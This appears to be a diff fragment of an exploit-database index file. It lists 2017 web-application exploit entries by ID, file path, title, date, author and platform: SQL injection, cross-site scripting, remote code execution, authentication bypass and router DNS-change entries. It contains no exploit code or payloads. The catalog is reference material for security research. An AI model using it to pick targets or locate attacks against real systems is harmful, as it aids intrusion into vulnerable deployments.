-42039,exploits/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps, -42042,exploits/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps, -42043,exploits/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps, -42044,exploits/php/webapps/42044.txt,"PlaySMS 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps, -42062,exploits/hardware/webapps/42062.txt,"Sophos Cyberoam - Cross-site scripting",2017-05-25,"Bhadresh Patel",hardware,webapps, -42064,exploits/multiple/webapps/42064.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'Editor::Command::execute' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps, -42065,exploits/multiple/webapps/42065.html,"WebKit - 'ContainerNode::parserRemoveChild' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps, -42066,exploits/multiple/webapps/42066.txt,"WebKit - 'ContainerNode::parserInsertBefore' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps, -42067,exploits/multiple/webapps/42067.html,"WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps, -42068,exploits/multiple/webapps/42068.html,"WebKit - 'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps, -42069,exploits/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps, -42074,exploits/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps, -42075,exploits/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps, -42093,exploits/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181 -42094,exploits/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps, -42095,exploits/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps, -42096,exploits/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps, -42097,exploits/php/webapps/42097.txt,"OV3 Online Administration 3.0 - SQL Injection",2017-05-31,LiquidWorm,php,webapps, -42098,exploits/php/webapps/42098.txt,"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting",2017-05-31,"Touhid M.Shaikh",php,webapps, -42101,exploits/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps, -42105,exploits/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps, -42106,exploits/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps, -42107,exploits/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps, -42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps, -42113,exploits/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' SQL Injection",2017-06-03,"Persian Hack Team",php,webapps, -42114,exploits/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps, -42117,exploits/windows/webapps/42117.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery",2017-06-05,hyp3rlinx,windows,webapps, -42118,exploits/windows/webapps/42118.txt,"Subsonic 6.1.1 - Server-Side Request Forgery",2017-06-05,hyp3rlinx,windows,webapps, -42120,exploits/windows/webapps/42120.txt,"Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2017-06-05,hyp3rlinx,windows,webapps, -42127,exploits/asp/webapps/42127.txt,"Kronos Telestaff < 2.92EU29 - SQL Injection",2017-06-05,"Goran Tuzovic",asp,webapps, -42129,exploits/php/webapps/42129.txt,"WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting",2017-06-06,defensecode,php,webapps,80 -42130,exploits/cgi/webapps/42130.txt,"Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure",2017-06-06,"X41 D-Sec GmbH",cgi,webapps,443 -42131,exploits/php/webapps/42131.txt,"Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting",2017-06-07,"Ahsan Tahir",php,webapps, -42132,exploits/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps, -42133,exploits/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps, -42143,exploits/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps, -42149,exploits/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps, -42150,exploits/hardware/webapps/42150.py,"Uniview NVR - Password Disclosure",2017-06-09,B1t,hardware,webapps, -42151,exploits/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps, -42153,exploits/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps, -42154,exploits/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps, -42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps, -42164,exploits/php/webapps/42164.txt,"Nuevomailer < 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps, -42166,exploits/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",php,webapps, -42167,exploits/php/webapps/42167.txt,"Real Estate Classifieds Script - SQL Injection",2017-06-12,EziBilisim,php,webapps, -42172,exploits/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps, -42173,exploits/php/webapps/42173.txt,"WordPress Plugin Event List < 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps, -42178,exploits/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps, -42184,exploits/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps, -42185,exploits/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps, -42187,exploits/linux/webapps/42187.py,"IBM Informix Dynamic Server - Code Injection / Remote Code Execution",2017-06-16,IMgod,linux,webapps, -42192,exploits/hardware/webapps/42192.sh,"iBall Baton iB-WRA150N - Unauthenticated DNS Change",2017-06-16,"Todor Donev",hardware,webapps, -42193,exploits/php/webapps/42193.txt,"nuevoMailer 6.0 - SQL Injection",2017-06-09,"Oleg Boytsev",php,webapps, -42194,exploits/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps, -42195,exploits/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps, -42196,exploits/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps, -42197,exploits/hardware/webapps/42197.sh,"D-Link DSL-2640B ADSL Router - 'dnscfg' Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps, -42205,exploits/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps, -42221,exploits/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,php,webapps, -42252,exploits/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",hardware,webapps, -42262,exploits/php/webapps/42262.txt,"GLPI 0.90.4 - SQL Injection",2017-06-27,"Eric CARTER",php,webapps, -42263,exploits/php/webapps/42263.txt,"WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection",2017-06-27,"Lenon Leite",php,webapps, -42268,exploits/windows/webapps/42268.py,"Easy File Sharing Web Server 7.2 - Unrestricted File Upload",2017-06-28,Chako,windows,webapps, -42269,exploits/linux/webapps/42269.txt,"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities",2017-06-28,"Core Security",linux,webapps, -42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps, -42293,exploits/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps, -42290,exploits/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps, -42291,exploits/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich Koomsusi",php,webapps, -42520,exploits/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,php,webapps, -42306,exploits/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps, -42307,exploits/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps, -42308,exploits/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps, -42309,exploits/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps, -42311,exploits/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps, -42312,exploits/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps, -42313,exploits/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps, -42314,exploits/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps, -42317,exploits/php/webapps/42317.txt,"WordPress Plugin Sabai Discuss - Cross-Site Scripting",2017-07-12,"Hesam Bazvand",php,webapps, -42320,exploits/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps, -42321,exploits/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps, -42322,exploits/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps, -42323,exploits/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps, -42324,exploits/multiple/webapps/42324.py,"Apache Struts 2.3.x Showcase - Remote Code Execution (PoC)",2017-07-07,"Vex Woo",multiple,webapps, -42326,exploits/hardware/webapps/42326.txt,"WDTV Live SMP 2.03.20 - Remote Password Reset",2017-07-14,Sw1tCh,hardware,webapps, -42330,exploits/php/webapps/42330.txt,"Orangescrum 1.6.1 - Multiple Vulnerabilities",2017-07-16,tomplixsee,php,webapps, -42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps, -42333,exploits/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps, -42335,exploits/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps, -42340,exploits/jsp/webapps/42340.txt,"Oracle E-Business Suite 12.x - Server-Side Request Forgery",2017-07-19,"Sarath Nair",jsp,webapps, -42342,exploits/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,cgi,webapps, -42343,exploits/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps, -42345,exploits/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps, -42344,exploits/cgi/webapps/42344.rb,"Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps, -42346,exploits/cgi/webapps/42346.txt,"Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection",2017-07-19,xort,cgi,webapps, -42347,exploits/php/webapps/42347.txt,"Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection",2017-07-20,Teng,php,webapps, -42348,exploits/php/webapps/42348.txt,"Tilde CMS 1.01 - Multiple Vulnerabilities",2017-07-20,"Raffaele Forte",php,webapps, -42351,exploits/php/webapps/42351.txt,"WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting",2017-07-20,8bitsec,php,webapps, -42352,exploits/hardware/webapps/42352.txt,"VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass",2017-07-20,Viktoras,hardware,webapps, -42353,exploits/php/webapps/42353.txt,"NEC UNIVERGE UM4730 < 11.8 - SQL Injection",2017-07-21,b0x41s,php,webapps, -42358,exploits/java/webapps/42358.rb,"ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)",2017-07-24,"Kacper Szurek",java,webapps, -42359,exploits/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps, -42371,exploits/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps, -42372,exploits/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps, -42378,exploits/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps, -42379,exploits/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps, -42380,exploits/php/webapps/42380.txt,"WordPress Plugin Ads Pro < 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps, -42383,exploits/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps, -42381,exploits/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps, -42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,java,webapps, -42387,exploits/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps, -42388,exploits/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps, -42401,exploits/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps, -42402,exploits/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",jsp,webapps, -42403,exploits/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps, -42404,exploits/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps, -42408,exploits/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps, -42410,exploits/php/webapps/42410.txt,"JoySale 2.2.1 - Arbitrary File Upload",2017-08-01,"Mutlu Benmutlu",php,webapps, -42412,exploits/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' SQL Injection",2017-08-02,"Meisam Monsef",php,webapps, -42413,exploits/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps, -42414,exploits/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps, -42415,exploits/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps, -42416,exploits/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps, -42417,exploits/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps, -42419,exploits/php/webapps/42419.txt,"Premium Servers List Tracker 1.0 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps, -42420,exploits/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps, -42421,exploits/php/webapps/42421.txt,"Muviko 1.0 - 'q' SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps, -42635,exploits/php/webapps/42635.txt,"Escort Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps, -42423,exploits/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps, -42427,exploits/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps, -42431,exploits/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80 -42434,exploits/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps, -42436,exploits/jsp/webapps/42436.py,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration",2017-08-09,LiquidWorm,jsp,webapps, -42437,exploits/jsp/webapps/42437.html,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-08-09,LiquidWorm,jsp,webapps, -42438,exploits/jsp/webapps/42438.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal",2017-08-09,LiquidWorm,jsp,webapps, -42439,exploits/jsp/webapps/42439.txt,"DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery",2017-08-09,LiquidWorm,jsp,webapps, -42440,exploits/php/webapps/42440.txt,"WebFile Explorer 1.0 - Arbitrary File Download",2017-08-09,"Ihsan Sencan",php,webapps, -42441,exploits/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps, -42442,exploits/php/webapps/42442.txt,"GIF Collection 2.0 - SQL Injection",2017-08-10,"Ihsan Sencan",php,webapps, -42443,exploits/php/webapps/42443.txt,"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting",2017-08-10,"Touhid M.Shaikh",php,webapps, -42444,exploits/windows/webapps/42444.txt,"Red-Gate SQL Monitor < 3.10 / 4.2 - Authentication Bypass",2017-08-10,"Paul Taylor",windows,webapps, -42446,exploits/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps, -42447,exploits/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps, -42448,exploits/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps, -42449,exploits/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps, -42450,exploits/hardware/webapps/42450.php,"AirMaster 3000M - Multiple Vulnerabilities",2017-08-12,"Mr.8Th BiT",hardware,webapps, -42452,exploits/php/webapps/42452.py,"RPi Cam Control < 6.3.14 - Remote Command Execution",2017-08-14,"Alexander Korznikov",php,webapps, -42458,exploits/php/webapps/42458.txt,"AdvanDate iCupid Dating Software 12.2 - SQL Injection",2017-08-15,"Ihsan Sencan",php,webapps, -42457,exploits/php/webapps/42457.txt,"ClipBucket 2.8.3 - Multiple Vulnerabilities",2017-08-15,bRpsd,php,webapps, -42461,exploits/php/webapps/42461.txt,"Online Quiz Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps, -42462,exploits/php/webapps/42462.txt,"Photogallery Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps, -42463,exploits/php/webapps/42463.txt,"Doctor Patient Project 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps, -42482,exploits/php/webapps/42482.txt,"Food Ordering Script 1.0 - SQL Injection",2017-08-17,"Ihsan Sencan",php,webapps, -42487,exploits/php/webapps/42487.txt,"LiveCRM 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42488,exploits/php/webapps/42488.txt,"LiveSupport 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42489,exploits/php/webapps/42489.txt,"LiveInvoices 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42490,exploits/php/webapps/42490.txt,"LiveSales 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42491,exploits/php/webapps/42491.txt,"LiveProjects 1.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42519,exploits/jsp/webapps/42519.txt,"Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution",2017-08-18,"Philip Pettersson",jsp,webapps, -42492,exploits/php/webapps/42492.txt,"Joomla! Component Appointment 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42493,exploits/php/webapps/42493.txt,"Joomla! Component Twitch Tv 1.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42494,exploits/php/webapps/42494.txt,"Joomla! Component KissGallery 1.0.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42496,exploits/php/webapps/42496.txt,"Matrimony Script 2.7 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42497,exploits/php/webapps/42497.txt,"eCardMAX 10.5 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42499,exploits/php/webapps/42499.txt,"SOA School Management 3.0 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42500,exploits/php/webapps/42500.txt,"Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42501,exploits/php/webapps/42501.txt,"Joomla! Component Calendar Planner 1.0.1 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42502,exploits/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42504,exploits/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps, -42505,exploits/php/webapps/42505.txt,"iTech B2B Script 4.42 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42517,exploits/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps, -42506,exploits/php/webapps/42506.txt,"iTech Business Networking Script 8.26 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42507,exploits/php/webapps/42507.txt,"iTech Caregiver Script 2.71 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42508,exploits/php/webapps/42508.txt,"iTech Classifieds Script 7.41 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42509,exploits/php/webapps/42509.txt,"iTech Image Sharing Script 4.13 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42510,exploits/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42511,exploits/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42513,exploits/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42514,exploits/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42515,exploits/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42516,exploits/php/webapps/42516.txt,"iTech Movie Script 7.51 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps, -42524,exploits/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42525,exploits/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42526,exploits/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42527,exploits/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42528,exploits/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42529,exploits/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42530,exploits/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42531,exploits/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps, -42532,exploits/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42533,exploits/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42534,exploits/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps, -42535,exploits/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps, -42561,exploits/php/webapps/42561.txt,"Joomla! Component OSDownloads 1.7.4 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps, -42562,exploits/php/webapps/42562.txt,"AutoCar 1.1 - 'category' SQL Injection",2017-08-25,"Bora Bozdogan",php,webapps, -42564,exploits/php/webapps/42564.txt,"Joomla! Component Responsive Portfolio 1.6.1 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps, -42566,exploits/php/webapps/42566.txt,"Matrimonial Script 2.7 - Authentication Bypass",2017-08-27,"Ali BawazeEer",php,webapps, -42569,exploits/php/webapps/42569.txt,"Smart Chat 1.0.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42570,exploits/php/webapps/42570.txt,"FTP Made Easy PRO 1.2 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42571,exploits/php/webapps/42571.txt,"WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download",2017-08-28,"Ihsan Sencan",php,webapps, -42572,exploits/php/webapps/42572.txt,"Easy Web Search 4.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42573,exploits/php/webapps/42573.txt,"PHP Search Engine 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42574,exploits/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps, -42575,exploits/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps, 